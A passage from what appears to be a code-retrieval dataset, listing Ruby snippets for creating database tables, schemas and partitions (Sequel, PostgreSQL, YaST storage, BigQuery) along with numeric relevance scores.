"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def partitioned_state\n super\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def attach_to_list_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n\n Tablature.database.attach_to_list_partition(parent_table_name, options)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def id_partition\n \n val = parent_id.to_s\n\n time = val[0..7]\n machine = val[8..13]\n pid = val[14..17]\n inc = val[18..23]\n \n # 000001\n \n [time, machine, pid, inc]\n\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? 
\"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_logical_replication_slot(name)\n typed_exec(\"SELECT pg_create_logical_replication_slot(#{connection.escape_literal(name)}, 'pgoutput')\")\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(size)\n disk_id = uuid\n sh \"zfs create -o reservation=1024 -o quota=1024 #{base}/#{disk_id}\"\n disk_id\n end",
"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def scaffold_table_name\n storage_name\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def set_partition(arg)\n if arg =~ /-/\n args = arg.split('-')\n arg1 = args[0]\n arg2 = args[1]\n else\n arg1 = arg\n arg2 = ''\n end\n\n partition = ''\n if arg1 == 'short' or arg1 == 's'\n partition = '-p tsl-short'\n elsif arg1 == 'med' or arg1 == 'm'\n partition = '-p tsl-medium'\n elsif arg1 == 'long' or arg1 == 'l'\n partition = '-p tsl-long'\n else\n warn \"incorrect queue. use either short or med or long queue\"\n exit\n end\n\n time = ''\n unless arg2 == ''\n number = /^(\\d+)\\w/.match(arg2)[1].to_i\n format = /^\\d+(\\w)/.match(arg2)[1].to_s\n if format == 'm' or format == 'mins'\n time = \"-t 00:#{number}:00\"\n elsif format == 'h' or format == 'hrs'\n time = \"-t #{number}:00:00\"\n elsif format == 'd' or format == 'days'\n time = \"-t #{number}-00:00:00\"\n else\n time = ''\n end\n end\n [partition, time]\nend",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_backup instance_id:, cluster_id:, backup_id:, source_table_id:, expire_time:\n backup = Google::Cloud::Bigtable::Admin::V2::Backup.new \\\n source_table: table_path(instance_id, source_table_id), expire_time: expire_time\n tables.create_backup parent: cluster_path(instance_id, cluster_id), backup_id: backup_id, backup: backup\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def make\n if dimension?\n dimension_key_builder\n elsif fact?\n FactKeyBuilder.new(staging_db[table.table_name])\n end\n end",
"def partition_edges\n\n par = RangePartition.new\n\n stateSet = @start_state.reachable_states\n\n stateSet.each do |s|\n s.edges.each {|lbl,dest| par.addSet(lbl) }\n end\n\n par.prepare\n\n stateSet.each do |s|\n newEdges = []\n s.edges.each do |lbl, dest|\n newLbls = par.apply(lbl)\n newLbls.each {|x| newEdges.push([x, dest]) }\n end\n s.clearEdges()\n\n newEdges.each do |lbl,dest|\n s.addEdge(lbl,dest)\n end\n end\n\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def DeletePartitionTable(disk, label)\n Builtins.y2milestone(\"DeletePartitionTable disk:%1 label:%2\", disk, label)\n label = DefaultDiskLabel(disk) if Builtins.isempty(label)\n ret = @sint.destroyPartitionTable(disk, label)\n if ret<0\n Builtins.y2error(\"DeletePartitionTable sint ret:%1\", ret)\n end\n UpdateTargetMap()\n ret == 0\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def add_key(name, type, clustering_order = nil)\n if @partition_key_columns.empty?\n unless clustering_order.nil?\n raise ArgumentError,\n \"Can't set clustering order for partition key #{name}\"\n end\n add_partition_key(name, type)\n else\n add_clustering_column(name, type, clustering_order)\n end\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table project_id:, dataset_id:, table_id:\n # [START bigquery_create_table]\n # project_id = \"Your Google Cloud project ID\"\n # dataset_id = \"ID of the dataset to create table in\"\n # table_id = \"ID of the table to create\"\n\n require \"google/cloud/bigquery\"\n\n bigquery = Google::Cloud::Bigquery.new project: project_id\n dataset = bigquery.dataset dataset_id\n\n table = dataset.create_table table_id do |updater|\n updater.string \"full_name\", mode: :required\n updater.integer \"age\", mode: :required\n end\n\n puts \"Created table: #{table_id}\"\n # [END bigquery_create_table]\nend",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def add_topic(topic, partitions=nil)\n if partitions.is_a? Integer\n partitions = (0..partitions - 1)\n end\n if partitions.nil?\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n -1\n )\n else\n partitions.each do |partition|\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n partition\n )\n end\n end\n end"
] |
[
"0.7089116",
"0.6901333",
"0.668798",
"0.6673402",
"0.6528554",
"0.64039016",
"0.62698126",
"0.62523615",
"0.6106679",
"0.60739046",
"0.6064444",
"0.6059633",
"0.60556954",
"0.6045033",
"0.60409546",
"0.59562093",
"0.5860424",
"0.5821033",
"0.5763657",
"0.57181513",
"0.569176",
"0.56453305",
"0.5538656",
"0.5506017",
"0.550334",
"0.549457",
"0.5482989",
"0.5389614",
"0.5327382",
"0.5311377",
"0.5272268",
"0.52684957",
"0.52538717",
"0.525012",
"0.52090627",
"0.5205005",
"0.51842576",
"0.51505214",
"0.5148609",
"0.51249045",
"0.5115734",
"0.5102319",
"0.5092358",
"0.505022",
"0.50295776",
"0.5004358",
"0.5002578",
"0.5001188",
"0.49937385",
"0.49874988",
"0.49870905",
"0.49844795",
"0.4970543",
"0.49648193",
"0.4958053",
"0.49575967",
"0.4941706",
"0.4936128",
"0.49317974",
"0.4928494",
"0.49182856",
"0.49092364",
"0.4902419",
"0.49008515",
"0.4899907",
"0.48941413",
"0.4886784",
"0.48851845",
"0.4855343",
"0.4854816",
"0.48539445",
"0.48405778",
"0.4819135",
"0.47995713",
"0.47910202",
"0.47898525",
"0.4787576",
"0.47829193",
"0.47703066",
"0.47696623",
"0.47689968",
"0.47530565",
"0.47484666",
"0.47373998",
"0.47262156",
"0.4721078",
"0.47162795",
"0.46932456",
"0.46831444",
"0.4678454",
"0.4661627",
"0.46614966",
"0.46603397",
"0.46585894",
"0.46544605",
"0.4651649",
"0.46501186",
"0.46456632",
"0.4642945",
"0.46394545"
] |
0.7671302
|
0
|
SQL for creating a schema.
|
def create_schema_sql(name, opts=OPTS)
  "CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{" AUTHORIZATION #{literal(opts[:owner])}" if opts[:owner]}"
end
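
For reference, a minimal self-contained Ruby sketch of how this generator behaves. The quote_identifier and literal stand-ins below are naive assumptions for illustration only; the real adapter helpers also escape embedded quotes:

# Naive stand-ins for the adapter helpers, so the generated SQL can be inspected.
OPTS = {}.freeze

def quote_identifier(name)
  "\"#{name}\""   # naive double-quoting; no escaping of embedded quotes
end

def literal(value)
  "'#{value}'"    # naive single-quoting; no escaping of embedded quotes
end

def create_schema_sql(name, opts = OPTS)
  "CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{" AUTHORIZATION #{literal(opts[:owner])}" if opts[:owner]}"
end

puts create_schema_sql(:reports)
# CREATE SCHEMA "reports"
puts create_schema_sql(:reports, if_not_exists: true, owner: "app_user")
# CREATE SCHEMA IF NOT EXISTS "reports" AUTHORIZATION 'app_user'

Both options are skipped when absent, since a false modifier-if makes the interpolation yield nil, which renders as an empty string.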
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
"def create_schema(schema)\n ActiveRecord::Base.connection.execute(\"CREATE SCHEMA #{schema}\")\n end",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_schema(schema_name, pg_username = nil)\n if pg_username.nil? # AR 4.0 compatibility - accepts only single argument\n execute \"CREATE SCHEMA #{schema_name}\"\n else\n execute(\"CREATE SCHEMA \\\"#{schema_name}\\\" AUTHORIZATION \\\"#{pg_username}\\\"\")\n end\n end",
"def create(schema,and_migrate = true)\n conn = ActiveRecord::Base.connection\n conn.execute(\"CREATE SCHEMA #{schema}\") unless conn.schema_exists? schema\n self.migrate(schema) if and_migrate\n end",
"def schema(schema_name, stream)\n stream << \" create_schema \\\"#{schema_name}\\\"\\n\"\n end",
"def add_schema(export_type = nil)\n mig_text = schema_generator_script(db_migration_schema, 'create')\n write_db_migration mig_text, \"#{db_migration_schema}_schema\", export_type: export_type\n end",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def schema(path = nil)\n s = \"ActiveRecord::Schema.define do\\n\"\n s << \" create_table \\\"#{File.basename(@data.path, \".*\")}\\\" do |t|\\n\"\n columns.each do |column|\n s << \" t.column #{column.schema_definition}\"\n end\n s << \" end\\nend\"\n \n if path\n File.open(path, 'w') {|f| f.puts(s)}\n end\n \n s\n end",
"def create_schema\n PgTools.create_schema id unless PgTools.schemas.include? id.to_s\n end",
"def create_db_schema(connection)\n connection.execute 'CREATE TABLE documents (id INTEGER PRIMARY KEY AUTOINCREMENT, name)'\n connection.execute 'CREATE TABLE words (id, doc_id, value)'\n connection.execute 'CREATE TABLE characters (id, word_id, value)'\nend",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
